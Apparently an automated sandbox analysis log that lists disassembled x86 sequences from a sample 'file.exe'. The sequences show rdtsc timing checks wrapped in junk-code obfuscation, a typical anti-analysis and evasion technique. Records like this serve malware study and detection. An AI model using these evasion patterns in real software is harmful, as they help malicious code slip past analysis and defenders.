Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5440438 second address: 5440459 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F661CE75E8Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5440459 second address: 5440468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470710 second address: 5470714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470714 second address: 547071A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547071A second address: 54707E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F661CE75E91h 0x00000011 and si, CA46h 0x00000016 jmp 00007F661CE75E91h 0x0000001b popfd 0x0000001c mov ax, 9CF7h 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 pushad 0x00000023 mov di, ax 0x00000026 mov cx, 200Bh 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d pushad 0x0000002e pushad 0x0000002f push ecx 0x00000030 pop ebx 0x00000031 movzx esi, dx 0x00000034 popad 0x00000035 pushfd 0x00000036 jmp 00007F661CE75E8Bh 0x0000003b sbb si, 862Eh 0x00000040 jmp 00007F661CE75E99h 0x00000045 popfd 0x00000046 popad 0x00000047 xchg eax, ecx 0x00000048 jmp 00007F661CE75E8Eh 0x0000004d push eax 0x0000004e pushad 0x0000004f mov dx, 9FC0h 0x00000053 popad 0x00000054 xchg eax, ecx 0x00000055 jmp 00007F661CE75E8Fh 0x0000005a xchg eax, esi 0x0000005b jmp 00007F661CE75E96h 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54707E0 second address: 54707E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54707E6 second address: 54707EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54707EC second address: 54707F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54707F0 second address: 5470859 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F661CE75E8Eh 0x00000011 lea eax, dword ptr [ebp-04h] 0x00000014 pushad 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F661CE75E8Ch 0x0000001c add si, 15F8h 0x00000021 jmp 00007F661CE75E8Bh 0x00000026 popfd 0x00000027 call 00007F661CE75E98h 0x0000002c pop eax 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 mov di, BA04h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470859 second address: 547086F instructions: 0x00000000 rdtsc 0x00000002 movsx edx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F661D45143Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547086F second address: 54708FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F661CE75E8Fh 0x00000009 xor esi, 401BB3CEh 0x0000000f jmp 00007F661CE75E99h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F661CE75E90h 0x0000001b add ax, 9448h 0x00000020 jmp 00007F661CE75E8Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 push eax 0x0000002a pushad 0x0000002b mov bx, 9DEAh 0x0000002f pushfd 0x00000030 jmp 00007F661CE75E8Bh 0x00000035 sub si, DE8Eh 0x0000003a jmp 00007F661CE75E99h 0x0000003f popfd 0x00000040 popad 0x00000041 nop 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54708FF second address: 5470906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cl, bh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470906 second address: 547091D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547091D second address: 5470925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470925 second address: 547092B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547092B second address: 547092F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547092F second address: 5470933 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470971 second address: 5470975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470975 second address: 5470979 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470979 second address: 547097F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547097F second address: 5470985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470985 second address: 5470989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470A1A second address: 5470A20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470A20 second address: 5470A24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470A24 second address: 5470A60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, esi 0x0000000a jmp 00007F661CE75E8Fh 0x0000000f pop esi 0x00000010 jmp 00007F661CE75E96h 0x00000015 leave 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov dx, 5EF0h 0x0000001d movsx edx, cx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470A60 second address: 5460279 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d cmp eax, 00000000h 0x00000010 setne al 0x00000013 xor ebx, ebx 0x00000015 test al, 01h 0x00000017 jne 00007F661D451437h 0x00000019 xor eax, eax 0x0000001b sub esp, 08h 0x0000001e mov dword ptr [esp], 00000000h 0x00000025 mov dword ptr [esp+04h], 00000000h 0x0000002d call 00007F662205AAC4h 0x00000032 mov edi, edi 0x00000034 pushad 0x00000035 mov bx, F7BCh 0x00000039 mov ax, dx 0x0000003c popad 0x0000003d push eax 0x0000003e jmp 00007F661D45143Ch 0x00000043 mov dword ptr [esp], ebp 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 mov ebx, 31AC48F0h 0x0000004e mov bx, 041Ch 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460279 second address: 54602BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007F661CE75E8Ch 0x0000000b xor cl, 00000038h 0x0000000e jmp 00007F661CE75E8Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 jmp 00007F661CE75E96h 0x0000001e push FFFFFFFEh 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54602BD second address: 54602C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54602C1 second address: 54602C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54602C7 second address: 54602F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451444h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F661D451439h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov dx, 7C10h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54602F1 second address: 54602F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54602F6 second address: 546032B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F661D451442h 0x00000009 add cx, C058h 0x0000000e jmp 00007F661D45143Bh 0x00000013 popfd 0x00000014 mov esi, 6D10610Fh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546032B second address: 5460335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, 69FF28A3h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460335 second address: 54603C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F661D451441h 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 push edx 0x00000016 mov edi, esi 0x00000018 pop ecx 0x00000019 pushfd 0x0000001a jmp 00007F661D45143Fh 0x0000001f adc ax, 91DEh 0x00000024 jmp 00007F661D451449h 0x00000029 popfd 0x0000002a popad 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f jmp 00007F661D451441h 0x00000034 pop eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F661D45143Dh 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54603C3 second address: 54603F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 jmp 00007F661CE75E93h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push 4E2F1739h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F661CE75E8Bh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54603F2 second address: 5460455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F661D45143Fh 0x0000000a sbb ch, FFFFFFAEh 0x0000000d jmp 00007F661D451449h 0x00000012 popfd 0x00000013 popad 0x00000014 xor dword ptr [esp], 3B863C49h 0x0000001b jmp 00007F661D45143Eh 0x00000020 mov eax, dword ptr fs:[00000000h] 0x00000026 jmp 00007F661D451440h 0x0000002b nop 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460455 second address: 546045D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546045D second address: 546052E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 pushfd 0x00000007 jmp 00007F661D451447h 0x0000000c adc ecx, 1B322ECEh 0x00000012 jmp 00007F661D451449h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c pushad 0x0000001d mov esi, edx 0x0000001f pushfd 0x00000020 jmp 00007F661D451443h 0x00000025 sub ch, FFFFFFDEh 0x00000028 jmp 00007F661D451449h 0x0000002d popfd 0x0000002e popad 0x0000002f nop 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F661D451443h 0x00000039 sub ax, B6EEh 0x0000003e jmp 00007F661D451449h 0x00000043 popfd 0x00000044 pushfd 0x00000045 jmp 00007F661D451440h 0x0000004a adc cx, 0E68h 0x0000004f jmp 00007F661D45143Bh 0x00000054 popfd 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546052E second address: 546057C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a sub esp, 18h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F661CE75E8Dh 0x00000014 xor cl, FFFFFF86h 0x00000017 jmp 00007F661CE75E91h 0x0000001c popfd 0x0000001d mov bh, ch 0x0000001f popad 0x00000020 push ebp 0x00000021 pushad 0x00000022 call 00007F661CE75E96h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546057C second address: 546058F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 mov dh, al 0x00000008 pop ebx 0x00000009 popad 0x0000000a mov dword ptr [esp], ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546058F second address: 5460593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460593 second address: 54605A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54605A4 second address: 54605AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54605AA second address: 54605AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54605AE second address: 54605DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d call 00007F661CE75E94h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54605DF second address: 5460677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov edi, 48F782F4h 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F661D45143Ah 0x00000011 xchg eax, esi 0x00000012 jmp 00007F661D451440h 0x00000017 xchg eax, edi 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F661D45143Eh 0x0000001f jmp 00007F661D451445h 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007F661D451440h 0x0000002b sub al, 00000038h 0x0000002e jmp 00007F661D45143Bh 0x00000033 popfd 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 mov cx, D981h 0x0000003d pushfd 0x0000003e jmp 00007F661D45143Eh 0x00000043 sub si, 7498h 0x00000048 jmp 00007F661D45143Bh 0x0000004d popfd 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460677 second address: 54606B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ecx 0x0000000e pushfd 0x0000000f jmp 00007F661CE75E95h 0x00000014 and eax, 01CC5CE6h 0x0000001a jmp 00007F661CE75E91h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54606B4 second address: 54606FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F661D451447h 0x00000008 mov ebx, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [75AF4538h] 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushfd 0x00000016 jmp 00007F661D45143Eh 0x0000001b add ax, 4AE8h 0x00000020 jmp 00007F661D45143Bh 0x00000025 popfd 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54606FB second address: 5460775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F661CE75E8Fh 0x0000000a and ax, 822Eh 0x0000000f jmp 00007F661CE75E99h 0x00000014 popfd 0x00000015 popad 0x00000016 xor dword ptr [ebp-08h], eax 0x00000019 jmp 00007F661CE75E8Eh 0x0000001e xor eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jmp 00007F661CE75E8Ah 0x00000028 pushfd 0x00000029 jmp 00007F661CE75E92h 0x0000002e adc esi, 30459208h 0x00000034 jmp 00007F661CE75E8Bh 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460775 second address: 54607E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F661D45143Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 movsx edi, si 0x00000014 mov ah, F8h 0x00000016 popad 0x00000017 nop 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F661D45143Bh 0x0000001f adc eax, 4DE0085Eh 0x00000025 jmp 00007F661D451449h 0x0000002a popfd 0x0000002b mov dx, cx 0x0000002e popad 0x0000002f lea eax, dword ptr [ebp-10h] 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54607E3 second address: 5460816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F661CE75E95h 0x0000000a sub ecx, 4CE25146h 0x00000010 jmp 00007F661CE75E91h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460816 second address: 5460826 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661D45143Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460826 second address: 5460862 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr fs:[00000000h], eax 0x0000000e jmp 00007F661CE75E97h 0x00000013 mov dword ptr [ebp-18h], esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F661CE75E90h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460862 second address: 5460871 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 545041F second address: 5450423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450423 second address: 5450429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450429 second address: 545045E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 pushfd 0x00000007 jmp 00007F661CE75E8Eh 0x0000000c jmp 00007F661CE75E95h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 545045E second address: 5450464 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450464 second address: 54504EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F661CE75E90h 0x00000008 pushfd 0x00000009 jmp 00007F661CE75E92h 0x0000000e xor cx, 6A98h 0x00000013 jmp 00007F661CE75E8Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d pushad 0x0000001e mov dl, EBh 0x00000020 jmp 00007F661CE75E90h 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F661CE75E8Eh 0x0000002e adc esi, 2706AC28h 0x00000034 jmp 00007F661CE75E8Bh 0x00000039 popfd 0x0000003a movzx eax, di 0x0000003d popad 0x0000003e mov ebp, esp 0x00000040 jmp 00007F661CE75E8Bh 0x00000045 sub esp, 2Ch 0x00000048 pushad 0x00000049 push ecx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54504EE second address: 54505A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov cx, 5D5Dh 0x00000009 popad 0x0000000a xchg eax, ebx 0x0000000b jmp 00007F661D451448h 0x00000010 push eax 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F661D451441h 0x00000018 add ah, 00000056h 0x0000001b jmp 00007F661D451441h 0x00000020 popfd 0x00000021 push eax 0x00000022 pushfd 0x00000023 jmp 00007F661D451447h 0x00000028 or ah, FFFFFF8Eh 0x0000002b jmp 00007F661D451449h 0x00000030 popfd 0x00000031 pop esi 0x00000032 popad 0x00000033 xchg eax, ebx 0x00000034 pushad 0x00000035 push edi 0x00000036 call 00007F661D451448h 0x0000003b pop eax 0x0000003c pop edx 0x0000003d push eax 0x0000003e push edx 0x0000003f call 00007F661D45143Eh 0x00000044 pop ecx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54505A0 second address: 54505EE instructions: 0x00000000 rdtsc 0x00000002 mov si, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b mov esi, 74339B75h 0x00000010 mov si, 79F1h 0x00000014 popad 0x00000015 pushfd 0x00000016 jmp 00007F661CE75E8Eh 0x0000001b or ah, FFFFFFC8h 0x0000001e jmp 00007F661CE75E8Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov dword ptr [esp], edi 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F661CE75E95h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54505EE second address: 54505F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450606 second address: 545060E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx ecx, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 545060E second address: 5450614 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450614 second address: 5450618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450618 second address: 5450665 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451442h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ebx, ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ebx, esi 0x00000012 pushfd 0x00000013 jmp 00007F661D451446h 0x00000018 jmp 00007F661D451445h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450665 second address: 545072C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edi, edi 0x0000000b pushad 0x0000000c push edi 0x0000000d pushfd 0x0000000e jmp 00007F661CE75E98h 0x00000013 or si, 4BD8h 0x00000018 jmp 00007F661CE75E8Bh 0x0000001d popfd 0x0000001e pop ecx 0x0000001f pushfd 0x00000020 jmp 00007F661CE75E99h 0x00000025 or ax, 6376h 0x0000002a jmp 00007F661CE75E91h 0x0000002f popfd 0x00000030 popad 0x00000031 inc ebx 0x00000032 pushad 0x00000033 movzx ecx, dx 0x00000036 pushfd 0x00000037 jmp 00007F661CE75E99h 0x0000003c xor ch, FFFFFF86h 0x0000003f jmp 00007F661CE75E91h 0x00000044 popfd 0x00000045 popad 0x00000046 test al, al 0x00000048 jmp 00007F661CE75E8Eh 0x0000004d je 00007F661CE7606Dh 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 rdtsc
